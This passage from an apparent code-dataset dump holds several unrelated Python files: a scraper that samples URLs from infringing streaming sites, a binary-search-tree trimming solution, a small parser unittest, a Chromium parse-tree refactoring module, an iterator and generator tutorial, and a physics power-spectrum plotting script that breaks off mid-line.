Firefox/65.0'}\n\n runConfig = Config('runConfig.txt')\n display = Display(visible = 0, size = (1280, 768))\n display.start()\n scrapeType = {'name':'referrer','ua':'uaNormal','ref':True,'browser':'chrome','mobile':False}\n\n streamingSites = set()\n page = requests.get(url,headers=headers)\n soup = BeautifulSoup(page.text, 'html.parser')\n links = soup.findAll('a', {'class': 'card-solution__title'})\n for link in links:\n try:\n subpage = requests.get(link['href'],headers=headers)\n except Exception as e:\n print('Error in loading streaming site: ', e)\n continue\n subsoup = BeautifulSoup(subpage.text, 'html.parser')\n \n streamingLink = subsoup.find('a', {'class': 'js-get-solution'})\n if(streamingLink is not None and streamingLink['href'] != ''):\n streamingSite = streamingLink['href']\n streamingSites.add(streamingSite)\n print(\"Number of streaming sites: \",len(streamingSites)) \n\n for streamingSite in streamingSites:\n print('Streaming site: ',streamingSite)\n if(not streamingSite.startswith('http')):\n streamingSite = 'http://'+streamingSite\n streamingDomain = rce.getDomain(streamingSite)\n follower = LinkFollow(1, runConfig, scrapeType, None)\n result = follower.followLink(streamingSite)\n try:\n follower.driver.quit()\n except:\n pass\n follower = None\n if(result is None):\n continue\n streamingSoup = BeautifulSoup(result[3], 'html.parser')\n baseUrl = getBaseUrl(streamingSite,streamingSoup)\n videoLinks = streamingSoup.findAll('a')\n movieUrls = set()\n seriesUrls = set()\n for videoLink in videoLinks:\n if(videoLink.has_attr('href')):\n videoUrl = urljoin(baseUrl,videoLink['href'])\n videoDomain = rce.getDomain(videoUrl)\n if(isUrlValid(videoUrl) and videoDomain == streamingDomain):\n if(isMovieUrl(videoUrl,movieTitles)):\n movieUrls.add(videoUrl)\n if(isMovieUrl(videoUrl,seriesTitles)):\n seriesUrls.add(videoUrl)\n \n sampleUrls = random.sample(list(movieUrls),min(len(movieUrls),sampleSize))\n if(len(sampleUrls) < sampleSize):\n sampleUrls += random.sample(list(seriesUrls),min(len(seriesUrls),sampleSize-len(sampleUrls)))\n \n for sampleUrl in sampleUrls:\n finalUrls[sampleUrl] = {'source':url}\n print('Number of copyright infringing URls selected: ',len(finalUrls))\n display.stop()\n return finalUrls\n\n\nif __name__ == '__main__':\n\n movieTitles, seriesTitles = getMovieTitles()\n finalUrls = findIllegalStreams(movieTitles, seriesTitles)\n","sub_path":"copyright.py","file_name":"copyright.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"567734591","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 12 14:04:48 2017\n\n@author: owen\n\"\"\"\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n \n# http://www.cnblogs.com/grandyang/p/7583185.html \n#class Solution(object):\n# def trimBST(self, root, L, R):\n# \"\"\"\n# :type root: TreeNode\n# :type L: int\n# :type R: int\n# :rtype: TreeNode\n# \"\"\"\n# # time O(n), space O(n)\n# if not root: \n# return None\n# if root.val < L:\n# return self.trimBST(root.right, L, R)\n# if root.val > R:\n# return self.trimBST(root.left, L, R)\n# root.left = self.trimBST(root.left, L, R)\n# root.right = self.trimBST(root.right, L, R)\n# return root\n \nclass Solution:\n def trimBST(self, root, L, R):\n \"\"\"\n :type root: TreeNode\n :type L: int\n :type R: int\n :rtype: TreeNode\n \"\"\"\n def trim(node):\n if not node:\n return None\n elif node.val > R:\n return trim(node.left)\n elif node.val < L:\n return trim(node.right)\n else:\n node.left = trim(node.left)\n node.right = trim(node.right)\n return node\n\n return trim(root)\n \nif __name__==\"__main__\":\n root=TreeNode(3)\n root.left=TreeNode(0)\n root.right=TreeNode(4)\n root.left.right=TreeNode(2)\n root.left.right.left=TreeNode(1)\n trimed=Solution().trimBST(root,1,3)\n print(trimed.val, trimed.left.val, trimed.left.left.val)","sub_path":"669. Trim a Binary Search Tree.py","file_name":"669. Trim a Binary Search Tree.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"555369919","text":"import unittest\nimport run\n\n\nclass TestParserMethods(unittest.TestCase):\n def test_plain(self):\n # self.assertEqual('foo'.upper(), 'FOO')\n verse = \"نَحْنُ أَعْلَمُ بِمَا يَقُولُونَ ۖ وَمَا أَنْتَ عَلَيْهِمْ بِجَبَّارٍ ۖ فَذَكِّرْ بِالْقُرْآنِ مَنْ يَخَافُ وَعِيدِ\"\n plain = run.strip_vowels(verse)\n maps = run.plain_ayahs_to_voweled()\n print(maps[plain])\n print(plain)\n \"\"\"\n def test_get_words(self):\n words = run.get_words(1)\n assert len(words) == 25\n\n def test_max_ayahs(self):\n max_lines = run.get_max_ayahs(55)\n '''\n for line, count in max_lines:\n print(line)\n print(str(count) + '\\n')\n '''\n assert max_lines[0][0][1] == 31\n \"\"\"\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test-driver.py","file_name":"test-driver.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"600707622","text":"# Copyright 2015 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom __future__ import print_function\n\nfrom __future__ import absolute_import\nimport parser\nimport symbol\nimport sys\nimport token\nimport tokenize\n\nfrom py_utils.refactor import offset_token\n\n\nclass Snippet(object):\n \"\"\"A node in the Python parse tree.\n\n The Python grammar is defined at:\n https://docs.python.org/2/reference/grammar.html\n\n There are two types of Snippets:\n TokenSnippets are leaf nodes containing actual text.\n Symbols are internal nodes representing higher-level groupings, and are\n defined by the left-hand sides of the BNFs in the above link.\n \"\"\"\n @property\n def type(self):\n raise NotImplementedError()\n\n @property\n def type_name(self):\n raise NotImplementedError()\n\n @property\n def children(self):\n \"\"\"Return a list of this node's children.\"\"\"\n raise NotImplementedError()\n\n @property\n def tokens(self):\n \"\"\"Return a tuple of the tokens this Snippet contains.\"\"\"\n raise NotImplementedError()\n\n def PrintTree(self, indent=0, stream=sys.stdout):\n \"\"\"Spew a pretty-printed parse tree. Mostly useful for debugging.\"\"\"\n raise NotImplementedError()\n\n def __str__(self):\n return offset_token.Untokenize(self.tokens)\n\n def FindAll(self, snippet_type):\n if isinstance(snippet_type, int):\n if self.type == snippet_type:\n yield self\n else:\n if isinstance(self, snippet_type):\n yield self\n\n for child in self.children:\n for snippet in child.FindAll(snippet_type):\n yield snippet\n\n def FindChild(self, snippet_type, **kwargs):\n for child in self.children:\n if isinstance(snippet_type, int):\n if child.type != snippet_type:\n continue\n else:\n if not isinstance(child, snippet_type):\n continue\n\n for attribute, value in kwargs:\n if getattr(child, attribute) != value:\n break\n else:\n return child\n raise ValueError('%s is not in %s. Children are: %s' %\n (snippet_type, self, self.children))\n\n def FindChildren(self, snippet_type):\n if isinstance(snippet_type, int):\n for child in self.children:\n if child.type == snippet_type:\n yield child\n else:\n for child in self.children:\n if isinstance(child, snippet_type):\n yield child\n\n\nclass TokenSnippet(Snippet):\n \"\"\"A Snippet containing a list of tokens.\n\n A list of tokens may start with any number of comments and non-terminating\n newlines, but must end with a syntactically meaningful token.\n \"\"\"\n\n def __init__(self, token_type, tokens):\n # For operators and delimiters, the TokenSnippet's type may be more specific\n # than the type of the constituent token. E.g. the TokenSnippet type is\n # token.DOT, but the token type is token.OP. This is because the parser\n # has more context than the tokenizer.\n self._type = token_type\n self._tokens = tokens\n self._modified = False\n\n @classmethod\n def Create(cls, token_type, string, offset=(0, 0)):\n return cls(token_type,\n [offset_token.OffsetToken(token_type, string, offset)])\n\n @property\n def type(self):\n return self._type\n\n @property\n def type_name(self):\n return token.tok_name[self.type]\n\n @property\n def value(self):\n return self._tokens[-1].string\n\n @value.setter\n def value(self, value):\n self._tokens[-1].string = value\n self._modified = True\n\n @property\n def children(self):\n return []\n\n @property\n def tokens(self):\n return tuple(self._tokens)\n\n @property\n def modified(self):\n return self._modified\n\n def PrintTree(self, indent=0, stream=sys.stdout):\n stream.write(' ' * indent)\n if not self.tokens:\n print(self.type_name, file=stream)\n return\n\n print('%-4s' % self.type_name, repr(self.tokens[0].string), file=stream)\n for tok in self.tokens[1:]:\n stream.write(' ' * indent)\n print(' ' * max(len(self.type_name), 4), repr(tok.string), file=stream)\n\n\nclass Symbol(Snippet):\n \"\"\"A Snippet containing sub-Snippets.\n\n The possible types and type_names are defined in Python's symbol module.\"\"\"\n\n def __init__(self, symbol_type, children):\n self._type = symbol_type\n self._children = children\n\n @property\n def type(self):\n return self._type\n\n @property\n def type_name(self):\n return symbol.sym_name[self.type]\n\n @property\n def children(self):\n return self._children\n\n @children.setter\n def children(self, value): # pylint: disable=arguments-differ\n self._children = value\n\n @property\n def tokens(self):\n tokens = []\n for child in self.children:\n tokens += child.tokens\n return tuple(tokens)\n\n @property\n def modified(self):\n return any(child.modified for child in self.children)\n\n def PrintTree(self, indent=0, stream=sys.stdout):\n stream.write(' ' * indent)\n\n # If there's only one child, collapse it onto the same line.\n node = self\n while len(node.children) == 1 and len(node.children[0].children) == 1:\n print(node.type_name, end=' ', file=stream)\n node = node.children[0]\n\n print(node.type_name, file=stream)\n for child in node.children:\n child.PrintTree(indent + 2, stream)\n\n\ndef Snippetize(f):\n \"\"\"Return the syntax tree of the given file.\"\"\"\n f.seek(0)\n syntax_tree = parser.st2list(parser.suite(f.read()))\n tokens = offset_token.Tokenize(f)\n\n snippet = _SnippetizeNode(syntax_tree, tokens)\n assert not tokens\n return snippet\n\n\ndef _SnippetizeNode(node, tokens):\n # The parser module gives a syntax tree that discards comments,\n # non-terminating newlines, and whitespace information. Use the tokens given\n # by the tokenize module to annotate the syntax tree with the information\n # needed to exactly reproduce the original source code.\n node_type = node[0]\n\n if node_type >= token.NT_OFFSET:\n # Symbol.\n children = tuple(_SnippetizeNode(child, tokens) for child in node[1:])\n return Symbol(node_type, children)\n else:\n # Token.\n grabbed_tokens = []\n while tokens and (\n tokens[0].type == tokenize.COMMENT or tokens[0].type == tokenize.NL):\n grabbed_tokens.append(tokens.popleft())\n\n # parser has 2 NEWLINEs right before the end.\n # tokenize has 0 or 1 depending on if the file has one.\n # Create extra nodes without consuming tokens to account for this.\n if node_type == token.NEWLINE:\n for tok in tokens:\n if tok.type == token.ENDMARKER:\n return TokenSnippet(node_type, grabbed_tokens)\n if tok.type != token.DEDENT:\n break\n\n assert tokens[0].type == token.OP or node_type == tokens[0].type\n\n grabbed_tokens.append(tokens.popleft())\n return TokenSnippet(node_type, grabbed_tokens)\n","sub_path":"common/py_utils/py_utils/refactor/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":6818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"387585237","text":"#!/appdir/app/anaconda3/bin python3\n# -*- encoding: utf-8 -*-\n'''\n@File : iterNextPy.py\n@Time : 2020/11/24 20:58:45\n@Author : haiy1026 \n@Version : 1.0\n@Contact : 531739146@qq.com\n@License : (C)Copyright 2020-2030\n@Desc : None\n'''\nimport sys\n\n# list=[1,2,3,4]\n\n# it=iter(list)\n# print(next(it))\n\n# # 可用for\n# for i in it:\n# print(i)\n\n# # 或者用next\n# while True:\n# try:\n# print(next(it))\n# except StopIteration:\n# sys.exit()\n\n# 返回数字的迭代器\n# class MyNum:\n# def __iter__(self):\n# self.a=1\n# return self\n \n# def __next__(self):\n# if self.a<=20:\n# x=self.a\n# self.a+=1\n# return x\n# else:\n# raise StopIteration\n \n\n# print(\"haha \")\n# mc=MyNum()\n\n# miter=iter(mc)\n\n# for i in range(24):\n# print(next(miter))\n\n\n\n\n# 生成器 yield实现\n\ndef fibonacci(n):\n a,b,counter=0,1,0\n while True:\n if(counter >n):\n return\n yield a\n\n a,b=b,a+b\n counter+=1\nf=fibonacci(10)\n\nwhile True:\n try:\n print(next(f),end=\" \")\n except StopIteration:\n sys.exit()","sub_path":"iterNextPy.py","file_name":"iterNextPy.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"551794771","text":"#!/usr/bin/env python3\n\"\"\"\nPower spectrum of fields for the Cori runs\n\"\"\"\nfrom __future__ import print_function\n\nimport argparse\nimport itertools\nimport json\nimport math\nimport multiprocessing\n\nimport h5py\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport palettable\nfrom matplotlib.collections import LineCollection\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d.art3d import Line3DCollection\nfrom scipy.optimize import curve_fit\n\nimport fitting_funcs\nimport pic_information\nfrom joblib import Parallel, delayed\nfrom json_functions import read_data_from_json\nfrom shell_functions import mkdir_p\n\nplt.style.use(\"seaborn-deep\")\nmpl.rc('text', usetex=True)\nmpl.rcParams['text.latex.preamble'] = \\\n[r\"\\usepackage{amsmath, bm}\",\n r\"\\DeclareMathAlphabet{\\mathsfit}{\\encodingdefault}{\\sfdefault}{m}{sl}\",\n r\"\\SetMathAlphabet{\\mathsfit}{bold}{\\encodingdefault}{\\sfdefault}{bx}{sl}\",\n r\"\\newcommand{\\tensorsym}[1]{\\bm{\\mathsfit{#1}}}\"]\nCOLORS = palettable.colorbrewer.qualitative.Set1_9.mpl_colors\n\n\ndef read_power_spectrum(fname):\n \"\"\"Read power spectrum data\n \"\"\"\n fdata = np.fromfile(fname, dtype=np.float32)\n sz, = fdata.shape\n kbins, fk = fdata[:sz//2], fdata[sz//2:]\n return kbins, fk\n\n\ndef var_labels():\n \"\"\"Labels for different variables\n \"\"\"\n labels = {\"ne\": \"n_e\",\n \"ni\": \"n_i\",\n \"bx\": \"B_x\",\n \"by\": \"B_y\",\n \"bz\": \"B_z\",\n \"ex\": \"E_x\",\n \"ey\": \"E_y\",\n \"ez\": \"E_z\",\n \"vex\": \"v_{ex}\",\n \"vey\": \"v_{ey}\",\n \"vez\": \"v_{ez}\",\n \"vix\": \"v_{ix}\",\n \"viy\": \"v_{iy}\",\n \"viz\": \"v_{iz}\"}\n return labels\n\n\ndef plot_power_spectrum(plot_config, show_plot=True):\n \"\"\"Plot power spectrum for one variable at one time frame\n Args:\n plot_config: plot configuration\n \"\"\"\n pic_run = plot_config[\"pic_run\"]\n pic_run_dir = plot_config[\"pic_run_dir\"]\n tframe = plot_config[\"tframe\"]\n var_name = plot_config[\"var_name\"]\n picinfo_fname = '../data/pic_info/pic_info_' + pic_run + '.json'\n pic_info = read_data_from_json(picinfo_fname)\n tindex = tframe * pic_info.fields_interval\n fdir = '../data/power_spectrum/' + pic_run + '/power_spectrum_' + var_name + '/'\n labels = var_labels()\n var_label = labels[var_name]\n fname = fdir + var_name + str(tindex) + '.kx'\n kx, fkx = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.ky'\n ky, fky = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.kz'\n kz, fkz = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.para'\n kpara, fkpara = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.perp'\n kperp, fkperp = read_power_spectrum(fname)\n\n smime = math.sqrt(pic_info.mime)\n dx_de = pic_info.dx_di * smime\n dy_de = pic_info.dy_di * smime\n dz_de = pic_info.dz_di * smime\n k1, k2 = 0.02, 0.5\n nkbins = 100\n\n idx = (np.abs(kx-k1)).argmin()\n idy = (np.abs(ky-k1)).argmin()\n idz = (np.abs(kz-k1)).argmin()\n fnorm = max(fkx[idx], fky[idy], fkz[idz]) * 2\n\n kpower = np.logspace(math.log10(k1), math.log10(k2), 100)\n fpower1 = kpower**(-5/3)\n fpower1 *= fnorm / fpower1[0]\n fpower2 = kpower**-1.5\n fpower2 *= fpower1[0] / fpower2[0]\n fpower3 = kpower**-2\n fpower3 *= fpower1[0] / fpower3[0]\n\n fig = plt.figure(figsize=[7, 5])\n rect = [0.15, 0.16, 0.8, 0.8]\n ax = fig.add_axes(rect)\n ax.set_prop_cycle('color', COLORS)\n ax.loglog(kx, fkx, linewidth=2, label=r'$k_x$')\n ax.loglog(ky, fky, linewidth=2, label=r'$k_y$')\n ax.loglog(kz, fkz, linewidth=2, label=r'$k_z$')\n ax.loglog(kpower, fpower1, linewidth=1, color='k',\n linestyle='--', label=r'$\\sim k^{-5/3}$')\n ax.loglog(kpower, fpower2, linewidth=1, color='k',\n linestyle='-.', label=r'$\\sim k^{-3/2}$')\n ax.loglog(kpower, fpower3, linewidth=1, color='k',\n linestyle=':', label=r'$\\sim k^{-2}$')\n ax.legend(loc=1, prop={'size': 16}, ncol=1,\n shadow=False, fancybox=False, frameon=False)\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n ax.tick_params(axis='x', which='minor', direction='in', top=True)\n ax.tick_params(axis='x', which='major', direction='in')\n ax.tick_params(axis='y', which='minor', direction='in', left=True)\n ax.tick_params(axis='y', which='major', direction='in')\n text1 = r'$' + var_label + '$'\n ax.text(0.02, 0.05, text1, color='k', fontsize=20,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='left', verticalalignment='center',\n transform=ax.transAxes)\n ax.set_xlim([1E-2, 1E1])\n # ax.set_ylim([1E-7, 2E-1])\n ax.set_xlabel(r'$kd_e$', fontsize=20)\n ax.set_ylabel(r'$E_{' + var_label + '}(k)$', fontsize=20)\n ax.tick_params(labelsize=16)\n\n fdir = '../img/power_spectrum/' + pic_run + '/' + var_name + '/'\n mkdir_p(fdir)\n fname = fdir + var_name + '_xyz_' + str(tframe) + '.pdf'\n fig.savefig(fname)\n\n fig = plt.figure(figsize=[7, 5])\n rect = [0.15, 0.16, 0.8, 0.8]\n ax = fig.add_axes(rect)\n ax.set_prop_cycle('color', COLORS)\n ax.loglog(kpara, fkpara, linewidth=2, label=r'$k_\\parallel$')\n ax.loglog(kperp, fkperp, linewidth=2, label=r'$k_\\perp$')\n ax.loglog(kpower, fpower1, linewidth=1, color='k',\n linestyle='--', label=r'$\\sim k^{-5/3}$')\n ax.loglog(kpower, fpower2, linewidth=1, color='k',\n linestyle='-.', label=r'$\\sim k^{-3/2}$')\n ax.loglog(kpower, fpower3, linewidth=1, color='k',\n linestyle=':', label=r'$\\sim k^{-2}$')\n ax.legend(loc=1, prop={'size': 16}, ncol=1,\n shadow=False, fancybox=False, frameon=False)\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n ax.tick_params(axis='x', which='minor', direction='in', top=True)\n ax.tick_params(axis='x', which='major', direction='in')\n ax.tick_params(axis='y', which='minor', direction='in', left=True)\n ax.tick_params(axis='y', which='major', direction='in')\n text1 = r'$' + var_label + '$'\n ax.text(0.02, 0.05, text1, color='k', fontsize=20,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='left', verticalalignment='center',\n transform=ax.transAxes)\n ax.set_xlim([1E-2, 1E1])\n # ax.set_ylim([1E-7, 2E-1])\n ax.set_xlabel(r'$kd_e$', fontsize=20)\n ax.set_ylabel(r'$E_{' + var_label + '}(k)$', fontsize=20)\n ax.tick_params(labelsize=16)\n fname = fdir + var_name + '_para_perp_' + str(tframe) + '.pdf'\n fig.savefig(fname)\n\n if show_plot:\n plt.show()\n else:\n plt.close('all')\n\n\ndef plot_power_spectrum_pub(plot_config, show_plot=True):\n \"\"\"Plot power spectrum for one variable at one time frame for publication\n Args:\n plot_config: plot configuration\n \"\"\"\n pic_run = plot_config[\"pic_run\"]\n pic_run_dir = plot_config[\"pic_run_dir\"]\n tframe = plot_config[\"tframe\"]\n var_name = plot_config[\"var_name\"]\n picinfo_fname = '../data/pic_info/pic_info_' + pic_run + '.json'\n pic_info = read_data_from_json(picinfo_fname)\n tindex = tframe * pic_info.fields_interval\n fdir = '../data/power_spectrum/' + pic_run + '/power_spectrum_' + var_name + '/'\n labels = var_labels()\n var_label = labels[var_name]\n fname = fdir + var_name + str(tindex) + '.kx'\n kx, fkx = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.ky'\n ky, fky = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.kz'\n kz, fkz = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.para'\n kpara, fkpara = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.perp'\n kperp, fkperp = read_power_spectrum(fname)\n\n k1, k2 = 0.02, 0.5\n nkbins = 100\n\n idx = (np.abs(kx-k1)).argmin()\n idy = (np.abs(ky-k1)).argmin()\n idz = (np.abs(kz-k1)).argmin()\n fnorm = max(fkx[idx], fky[idy], fkz[idz]) * 2\n\n kpower = np.logspace(math.log10(k1), math.log10(k2), 100)\n fpower1 = kpower**(-5/3)\n fpower1 *= fnorm / fpower1[0]\n fpower2 = kpower**-1.5\n fpower2 *= fpower1[0] / fpower2[0]\n fpower3 = kpower**-2\n fpower3 *= fpower1[0] / fpower3[0]\n\n fig = plt.figure(figsize=[3.5, 2.5])\n rect = [0.17, 0.16, 0.78, 0.8]\n ax = fig.add_axes(rect)\n ax.set_prop_cycle('color', COLORS)\n ax.loglog(kpara, fkpara, linewidth=1, label=r'$k_\\parallel$')\n ax.loglog(kperp, fkperp, linewidth=1, label=r'$k_\\perp$')\n ax.loglog(kpower, fpower3, linewidth=1, color='k',\n linestyle=':', label=r'$\\sim k^{-2}$')\n ax.legend(loc=1, prop={'size': 10}, ncol=1,\n shadow=False, fancybox=False, frameon=False)\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n ax.tick_params(axis='x', which='minor', direction='in', top=True)\n ax.tick_params(axis='x', which='major', direction='in')\n ax.tick_params(axis='y', which='minor', direction='in', left=False)\n ax.tick_params(axis='y', which='major', direction='in')\n twci = math.ceil((tframe * pic_info.dt_fields) / 0.1) * 0.1\n text1 = r'$t\\Omega_{ci}=' + (\"{%0.0f}\" % twci) + '$'\n ax.text(0.02, 0.05, text1, color='k', fontsize=10,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='left', verticalalignment='center',\n transform=ax.transAxes)\n ax.set_xlim([1E-2, 1E1])\n ax.set_ylim([1E-7, 2E-1])\n ax.set_yticks((np.logspace(-7, -1, 4)))\n ax.set_xlabel(r'$kd_e$', fontsize=10)\n ax.set_ylabel(r'$E_{' + var_label + '}(k)$', fontsize=10)\n ax.tick_params(labelsize=8)\n fdir = '../img/power_spectrum_pub/' + pic_run + '/' + var_name + '/'\n mkdir_p(fdir)\n fname = fdir + var_name + '_para_perp_' + str(tframe) + '.pdf'\n fig.savefig(fname)\n\n if show_plot:\n plt.show()\n else:\n plt.close('all')\n\n\ndef magnetic_power_spectrum(plot_config, show_plot=True):\n \"\"\"Plot power spectrum of magnetic field\n Args:\n plot_config: plot configuration\n \"\"\"\n tframe = plot_config[\"tframe\"]\n bg = plot_config[\"bg\"]\n pic_runs = [\"2D-Lx150-bg\" + str(bg) + \"-150ppc-16KNL\"]\n pic_runs.append(\"3D-Lx150-bg\" + str(bg) + \"-150ppc-2048KNL\")\n pic_run = pic_runs[1]\n root_dir = \"/net/scratch3/xiaocanli/reconnection/Cori_runs/\"\n pic_run_dir = root_dir + pic_run + \"/\"\n picinfo_fname = '../data/pic_info/pic_info_' + pic_run + '.json'\n pic_info = read_data_from_json(picinfo_fname)\n k1, k2 = 0.03, 1.0\n nkbins = 100\n pindex = -2.7\n kpower = np.logspace(math.log10(k1), math.log10(k2), 100)\n fpower3 = kpower**pindex / 1E4\n\n fig = plt.figure(figsize=[3.5, 2.5])\n rect = [0.17, 0.16, 0.78, 0.8]\n ax = fig.add_axes(rect)\n COLORS = palettable.tableau.Tableau_10.mpl_colors\n ax.set_prop_cycle('color', COLORS)\n tframes = range(10, 36, 5)\n\n for tframe in tframes:\n tindex = tframe * pic_info.fields_interval\n for ivar, var in enumerate([\"bx\", \"by\", \"bz\"]):\n fdir = ('../data/power_spectrum/' + pic_run +\n '/power_spectrum_' + var + '/')\n fname = fdir + var + str(tindex) + '.para'\n kpara, fdata = read_power_spectrum(fname)\n if ivar > 0:\n fkpara += fdata\n else:\n fkpara = fdata\n fname = fdir + var + str(tindex) + '.perp'\n kperp, fdata = read_power_spectrum(fname)\n if ivar > 0:\n fkperp += fdata\n else:\n fkperp = fdata\n ax.loglog(kperp, fkperp, linewidth=1, label=r'$k_\\perp$')\n\n label1 = r'$\\propto k_\\perp^{' + str(pindex) + '}$'\n ax.loglog(kpower, fpower3, linewidth=0.5, color='k',\n linestyle='--', label=label1)\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n ax.tick_params(axis='x', which='minor', direction='in', top=False)\n ax.tick_params(axis='x', which='major', direction='in')\n ax.tick_params(axis='y', which='minor', direction='in', left=False)\n ax.tick_params(axis='y', which='major', direction='in')\n twci = math.ceil((tframe * pic_info.dt_fields) / 0.1) * 0.1\n # text1 = r'$t\\Omega_{ci}=' + (\"{%0.0f}\" % twci) + '$'\n ax.text(0.7, 0.47, label1, color='k', fontsize=10,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='left', verticalalignment='center',\n transform=ax.transAxes)\n ax.set_xlim([1E-2, 5E0])\n # ax.set_ylim([1E-7, 2E-1])\n ax.set_yticks((np.logspace(-7, -1, 4)))\n ax.set_xlabel(r'$k_\\perp d_e$', fontsize=10)\n ax.set_ylabel(r'$E_B(k_\\perp)$', fontsize=10)\n ax.tick_params(labelsize=8)\n\n # Embedded plot for energy evolution\n rect1 = [0.29, 0.29, 0.30, 0.28]\n ax1 = fig.add_axes(rect1)\n ax1.tick_params(bottom=True, top=True, left=True, right=True)\n ax1.tick_params(axis='x', which='minor', direction='in', top=False)\n ax1.tick_params(axis='x', which='major', direction='in')\n ax1.tick_params(axis='y', which='minor', direction='in')\n ax1.tick_params(axis='y', which='major', direction='in')\n\n for irun, pic_run in enumerate(pic_runs):\n picinfo_fname = '../data/pic_info/pic_info_' + pic_run + '.json'\n pic_info = read_data_from_json(picinfo_fname)\n enorm = pic_info.ene_magnetic[0]\n ene_bx = pic_info.ene_bx\n ene_by = pic_info.ene_by\n ene_bz = pic_info.ene_bz\n ene_magnetic = pic_info.ene_magnetic\n ene_electric = pic_info.ene_electric\n kene_e = pic_info.kene_e\n kene_i = pic_info.kene_i\n ene_bx /= enorm\n ene_by /= enorm\n ene_bz /= enorm\n ene_magnetic /= enorm\n kene_e /= enorm\n kene_i /= enorm\n tenergy = pic_info.tenergy\n\n lstyle = '-' if '3D' in pic_run else '--'\n ax1.plot(tenergy, ene_magnetic, linewidth=1,\n linestyle=lstyle, color='k')\n ax1.set_ylim([0.66, 1.02])\n # for iframe, tframe in enumerate(tframes):\n # twci = tframe * pic_info.dt_fields\n # ax1.plot([twci, twci], ax1.get_ylim(), linewidth=0.5,\n # linestyle=':', color=COLORS[iframe])\n tframes = np.asarray(tframes) * pic_info.dt_fields\n nframe, = tframes.shape\n ax1.scatter(tframes, [0.7]*nframe, c=COLORS[:nframe],\n marker='x', s=10, linewidth=0.5)\n ax1.text(0.6, 0.28, \"2D\", color='k', fontsize=6,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='center', verticalalignment='center',\n transform=ax1.transAxes)\n ax1.text(0.6, 0.52, \"3D\", color='k', fontsize=6,\n bbox=dict(facecolor='none', alpha=1.0, edgecolor='none', pad=10.0),\n horizontalalignment='center', verticalalignment='center',\n transform=ax1.transAxes)\n ax1.tick_params(labelsize=6)\n ax1.set_xlabel(r'$t\\Omega_{ci}$', fontsize=6)\n ax1.set_ylabel(r'$\\varepsilon_B/\\varepsilon_{B0}$', fontsize=6)\n ax1.set_xlim([0, 400])\n\n fdir = '../img/cori_3d/power_spectrum_pub/' + pic_run + '/'\n mkdir_p(fdir)\n fname = fdir + 'mag_perp.pdf'\n fig.savefig(fname)\n\n if show_plot:\n plt.show()\n else:\n plt.close('all')\n\n\ndef pspect_mag_vel(plot_config, show_plot=True):\n \"\"\"Plot power spectrum for magnetic field and velocity field\n Args:\n plot_config: plot configuration\n \"\"\"\n pic_run = plot_config[\"pic_run\"]\n pic_run_dir = plot_config[\"pic_run_dir\"]\n tframe = plot_config[\"tframe\"]\n component = plot_config[\"component\"]\n picinfo_fname = '../data/pic_info/pic_info_' + pic_run + '.json'\n pic_info = read_data_from_json(picinfo_fname)\n tindex = tframe * pic_info.fields_interval\n var_name = 'vi' + component\n fdir = '../data/power_spectrum/' + pic_run + '/power_spectrum_' + var_name + '/'\n fname = fdir + var_name + str(tindex) + '.para'\n kpara, fkpara_v = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.perp'\n kperp, fkperp_v = read_power_spectrum(fname)\n # fkpara_v *= pic_info.mime * 0.5\n # fkperp_v *= pic_info.mime * 0.5\n\n var_name = 'b' + component\n fdir = '../data/power_spectrum/' + pic_run + '/power_spectrum_' + var_name + '/'\n fname = fdir + var_name + str(tindex) + '.para'\n kpara, fkpara_b = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.perp'\n kperp, fkperp_b = read_power_spectrum(fname)\n\n k1, k2 = 0.05, 0.5\n nkbins = 100\n\n id_para = (np.abs(kpara-k1)).argmin()\n id_perp = (np.abs(kperp-k1)).argmin()\n fnorm1 = max(fkpara_b[id_para], fkperp_b[id_perp]) * 2\n fnorm2 = max(fkpara_v[id_para], fkperp_v[id_perp]) * 4\n\n kpower = np.logspace(math.log10(k1), math.log10(k2), 100)\n fpower1 = kpower**(-5/3)\n fpower1 /= fpower1[0]\n fpower2 = kpower**-1.5\n fpower2 *= fpower1[0] / fpower2[0]\n fpower3 = kpower**-2\n fpower3 *= fpower1[0] / 